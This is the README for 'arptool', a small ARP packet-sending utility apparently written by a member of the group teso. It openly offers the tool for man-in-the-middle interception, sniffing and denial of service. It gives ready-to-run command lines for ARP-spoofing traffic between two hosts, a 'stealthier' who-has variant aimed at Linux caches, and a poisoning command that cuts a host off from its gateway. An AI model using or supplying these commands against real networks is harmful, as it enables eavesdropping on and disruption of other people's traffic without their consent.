arptool - simple arp tool
version 0.0.1
readme file


what for ?
with arptool you can send simple arp packets, in this case just who-has and
arp-reply packets. this can be used together in a script to set up man-in-the-
middle arp-relaying or as denial of service attack. you can also reroute lan
traffic which would otherwise not be visible, to sniff and play dirty tricks
on your machine.


usage

usage: arptool <device> <type> <dstip> <dstmac> <srcip> <srcmac>

<device>                target device to send arp packet on
<type>                  type of arp packet to send
        tell    arp reply
        bcast   arp who-has ask
<dstip>/<dstmac>        the destination pair
<srcip>/<srcmac>        the source pair


examples

reroute traffic between ip1 (10.0.0.1) with mac1 (00:10:00:00:00:01) and ip2
(10.0.0.2) with mac2 (00:10:00:00:00:02), our mac is 00:e8:00:01:01:01:

  ./arptool eth0 tell 10.0.0.1 00:10:00:00:00:01 10.0.0.2 00:e8:00:01:01:01
  ./arptool eth0 tell 10.0.0.2 00:10:00:00:00:02 10.0.0.1 00:e8:00:01:01:01

if you have ip forwarding enabled in your kernel you should now be able to
watch any traffic between 10.0.0.1 and 10.0.0.2, even in a switched
environment.

if your target is running a linux kernel you may want to go for a small
variation (doesn't work on *bsd or windows), which is slightly more
stealthier and unknown:

  ./arptool eth0 bcast 10.0.0.1 00:10:00:00:00:01 10.0.0.2 00:e8:00:01:01:01
  ./arptool eth0 bcast 10.0.0.2 00:10:00:00:00:02 10.0.0.1 00:e8:00:01:01:01

this sends who-has requests, which contain our source ip/mac as source. this
information makes it into a linux kernels arp cache.

just remember you have to do this every few seconds to hold the entry within
the arp cache.

another example, you want to deny ip1 (10.0.0.1) with mac1 (00:10:00:00:00:01)
any traffic to the external gateway (10.0.0.254).

  ./arptool eth0 tell 10.0.0.1 00:10:00:00:00:01 10.0.0.254 8e:81:82:83:84:84

where 8e:81:82:83:84:84 is just a bogus mac address which should not exist.
another trick is to enable forwarding but to setup a static host route, with
this you can selective replace any computer, even if it is an external one
which doesn't even have a mac.


ps: i hope i can improve this stuff soon, so you won't have to manually gather
    the mac addresses.

greets for this one fly out to rookie for neat theoretical and practical
(hehe) discussions about arp. you rock!

cheers,
scut of teso


